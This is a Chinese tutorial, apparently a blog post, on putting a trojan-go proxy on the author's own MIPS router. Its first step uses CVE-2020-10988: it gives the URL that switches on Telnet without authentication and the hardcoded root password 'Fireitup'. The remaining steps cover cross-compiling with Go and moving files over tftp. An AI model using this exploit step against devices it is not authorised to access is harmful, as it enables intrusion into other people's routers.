- 如何在路由器上安装代理服务:详细教程
- 步骤一:通过漏洞进入路由器系统
- 开启Telnet服务
- 使用Telnet登录路由器系统
- 查看系统信息和CPU信息
- 步骤二:交叉编译MIPS程序
- Go对MIPS的支持
- 安装TFTP Server
- 使用BusyBox tftp传输文件
- 在路由器系统中下载编译后的main文件
- 步骤三:安装和运行代理服务
- 结论
- 相关参考:
如何在路由器上安装代理服务:详细教程
在这篇文章中,我们将详细介绍如何在路由器上安装代理服务。这包括从通过Telnet登录路由器系统,到在路由器上运行代理程序的每一个步骤。
步骤一:通过漏洞进入路由器系统
首先,我们需要进入路由器的系统。可以通过搜索该路由器厂商的相关漏洞来实现这一点。例如,CVE-2020-10988是一个已知的漏洞,可以帮助我们访问路由器系统。
开启Telnet服务
访问 http://192.168.0.1/goform/telnet
,响应信息显示 telnet is up
. 表示Telnet
服务已开启。
使用Telnet登录路由器系统
在命令行中输入以下命令,使用默认的用户名和密码登录路由器系统:
telnet 192.168.0.1
用户名:root
密码:Fireitup
查看系统信息和CPU信息
登录成功后,输入以下命令查看系统信息:
~ # cat /proc/version
Linux version 3.3.8 (root@linux-qxix) (gcc version 4.9.3 (Buildroot 2015.08) ) #1 Tue Dec 17 22:33:06 CST 2019
以及CPU信息:
~ # cat /proc/cpuinfo
system type : Qualcomm Atheros QCA956X rev 0
machine : Qualcomm Atheros AP152 reference board
processor : 0
cpu model : MIPS 74Kc V5.0
BogoMIPS : 385.84
wait instruction : yes
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented : mips16 dsp
shadow register sets : 1
kscratch registers : 0
core : 0
VCED exceptions : not available
VCEI exceptions : not available
步骤二:交叉编译MIPS程序
根据上一步获取的CPU信息,我们知道该路由器使用的是MIPS架构的处理器。因此,我们需要使用Go语言交叉编译一个MIPS程序。
Go对MIPS的支持
参考Go的官方文档,确认Go对MIPS的支持情况:
获取上述信息后,使用 Go 交叉编译 MIPS 程序。
Go MIPS支持
安装TFTP Server
我们需要安装一个TFTP服务器以便在路由器和本地机器之间传输文件。可以使用tftpd64:
TFTP服务器
使用BusyBox tftp传输文件
路由器系统中一般预装了BusyBox,可以使用tftp命令从TFTP服务器下载或上传文件。
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
下载文件:
tftp -g -r FilePath Host
上传文件:
tftp -p -l FilePath Host
在路由器系统中下载编译后的main文件
tftp -g -r main 192.168.0.142
main 100% |********************************************************| 1088k 0:00:00 ETA
下载完成后,给文件添加执行权限并运行:
chmod +x main
./main
运行后应该看到类似 Hello cheungxiongwei
的输出。
步骤三:安装和运行代理服务
下载trojan-go
我们选择下载mips-softfloat版本的trojan-go。下载完成后,将压缩包转换成tar格式,以便在路由器系统中解压。
部署代理即可通过路由器访问外面的世界了。
结论
通过以上步骤,我们成功在路由器上安装并运行了一个代理服务。这使得路由器能够通过代理访问外部网络。通过详细的教程,我们可以轻松实现这一目标,并为日后的网络优化提供更多可能性。
相关参考:
- https://cloud.tencent.com/developer/article/2207058
- https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
- https://www.ise.io/wp-content/uploads/2020/08/kicking_devices_and_taking_cves.pdf